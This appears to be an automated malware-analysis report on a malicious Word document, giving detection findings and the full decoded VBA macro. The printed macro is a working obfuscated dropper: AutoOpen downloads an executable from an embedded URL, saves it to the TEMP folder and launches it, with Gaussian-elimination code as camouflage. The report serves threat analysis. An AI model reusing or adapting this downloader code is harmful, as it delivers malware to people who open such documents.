Verdict: MALICIOUS
Risk score: 270
Heuristics: 9

Findings:

- ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
- VBA macros detected [medium, OLE_VBA_MACROS, 5 related findings]: Document contains VBA macro code
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script: `Set cpvRO2CMs8 = CreateObject(zknvV5v1T)`
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call. Matched line in script: `CallByName tQ9Qwdby, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84) _`
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high, OLE_VBA_EXPR_DROPPER_URL]: A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; it is surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]: AutoOpen macro. Matched line in script: `Sub autoopen()`
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://www.frische-center.com/45/47.exe (referenced by macro)
Extracted artifacts: 1

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 550e597b263ee14fbc44a3904168de41512ab8f2b6574fae0091d4eff4401080) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5397 bytes |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (700)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Integer)
OUlemjt4o
End Sub
Attribute VB_Name = "Module1"
' Gaussian Elimination
'
' Parameters:
' A - augmented square matrix, N x N + 1
' x - solution matrix, N x 1
'
' Return value:
' True - if non-singular.
' False - if singular or error.
'
Function GaussianElimination(A() As Single, x() As Single) As Boolean
Dim i, j, k, N, max As Integer
Dim t As Single
On Error GoTo errHandler
N = UBound(A, 1) - LBound(A, 1) + 1
For i = 0 To N - 1
max = i
For j = i + 1 To N - 1
If Abs(A(i, j)) > Abs(A(max, i)) Then
max = j
End If
Next j
If (max <> i) Then
For k = i To N
t = A(max, k)
A(max, k) = A(i, k)
A(i, k) = t
Next k
End If
For j = i + 1 To N - 1
For k = N To i Step -1
A(j, k) = A(j, k) - A(i, k) * A(j, i) / A(i, i)
Next k
Next j
Next i
For i = N - 1 To 0 Step -1
t = 0
For j = i + 1 To N - 1
t = t + A(i, j) * x(j)
Next j
x(i) = (A(i, N) - t) / A(i, i)
Next i
GaussianElimination = True
Exit Function
errHandler: ' Division by zero
GaussianElimination = False
On Error GoTo 0
End Function
Public Function cpvRO2CMs8(zknvV5v1T As String)
Set cpvRO2CMs8 = CreateObject(zknvV5v1T)
End Function
Public Function bFNVp3J2xvb(d9cOd0vwnKMt As Variant, ytGfE7ViuPf8F As String)
Dim KsgMnnqSE7: Set KsgMnnqSE7 = cpvRO2CMs8("A" & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & "r" & Chr(101) & "a" & "m")
With KsgMnnqSE7
.Type = 1
.Open
.write d9cOd0vwnKMt
.savetofile ytGfE7ViuPf8F, 2
End With
End Function
Attribute VB_Name = "Module2"
Private Const N = 100
Public cxEoBxbpZjkM As String
Sub OUlemjt4o()
Jjoibww = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(60) & "/" & Chr(119) & Chr(119) & Chr(119) & "." & Chr(102) & Chr(114) & "i" & Chr(115) & Chr(99) & Chr(104) & Chr(101) & Chr(45) & Chr(99) & Chr(101) & Chr(110) & Chr(116) & Chr(101) & Chr(114) & Chr(46) & "c" & "o" & "m" & Chr(47) & Chr(52) & Chr(53) & Chr(47) & Chr(52) & Chr(55) & Chr(46) & "e" & Chr(120) & Chr(101)
Set tQ9Qwdby = cpvRO2CMs8("M" & Chr(105) & Chr(99) & "r" & "o" & Chr(115) & "o" & Chr(102) & "t" & "." & "X" & Chr(77) & "L" & Chr(72) & Chr(84) & Chr(84) & "P")
Jjoibww = Replace(Jjoibww, Chr(60), "", 1, 1, vbTextCompare)
CallByName tQ9Qwdby, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84) _
, Jjoibww _
, False
Set Oze5NNxtTOM = cpvRO2CMs8(Chr(87) & "S" & "c" & "r" & Chr(105) & Chr(112) & "t" & Chr(46) & Chr(83) & Chr(104) & "e" & Chr(108) & Chr(108))
Set bTVL5zZEy5Xk3 = CallByName(Oze5NNxtTOM, "E" & Chr(110) & Chr(118) & Chr(105) & "r" & "o" & Chr(110) & "m" & "e" & Chr(110) & "t", VbGet, "P" & Chr(114) & "o" & Chr(99) & Chr(101) & Chr(115) & Chr(115))
oKmL1jWBacAVz = bTVL5zZEy5Xk3(Chr(84) & Chr(69) & Chr(77) & Chr(80))
cxEoBxbpZjkM = oKmL1jWBacAVz & Chr(92) & Chr(115) & Chr(105) & Chr(114) & Chr(111) & Chr(98) & Chr(103) & Chr(99) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim JaPwlp2mL() As Byte
CallByName tQ9Qwdby, Chr(83) & "e" & Chr(110) & Chr(100), VbMethod
JaPwlp2mL = CallByName(tQ9Qwdby, Chr(114) & Chr(101) & "s" & Chr(112) & Chr(111) & Chr(110) & Chr(115) & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
bFNVp3J2xvb JaPwlp2mL, cxEoBxbpZjkM
On Error GoTo egb760cv
A = 2322 / 0
On Error GoTo 0
CmvHn2MiIV:
Exit Sub
egb760cv:
mgXSela7jWZZ ("LFep9nOQC")
Resume CmvHn2MiIV
End Sub
Sub main()
Dim A(0 To N - 1, 0 To N) As Single
Dim x(N) As Single
Call Populate(A)
Dim i As Integer, j As Integer
Dim v As String
For i = 0 To N - 1
For j = 0 To N
v = v & A(i, j)
If (j <> N) Then v = v & "|"
Next j
v = v & vbCrLf
Next i
Debug.Print "************"
Debug.Print v
Call GaussianElimination(A, x)
v = ""
For i = 0 To N - 1
v = v & x(i)
If (i <> N - 1) Then v = v & "|"
Next i
Debug.Print v
Debug.Print "************"
End Sub
Public Function mgXSela7jWZZ(it7Jnq06zf As String)
Set N9DiXkAk = cpvRO2CMs8("S" & Chr(104) & Chr(101) & Chr(108) & "l" & Chr(46) & "A" & Chr(112) & Chr(112) & "l" & "i" & "c" & "a" & "t" & Chr(105) & Chr(111) & Chr(110))
N9DiXkAk.Open (cxEoBxbpZjkM)
End Function
' Populate matrix
'
' Parameters:
' A - augmented square matrix, N x N + 1
Private Sub Populate(A() As Single)
Dim i, j, N As Integer
Randomize
N = UBound(A, 1)
For i = 0 To N
For j = 0 To N + 1
A(i, j) = Int(1000 * Rnd + 1)
Next j
Next i
End Sub
```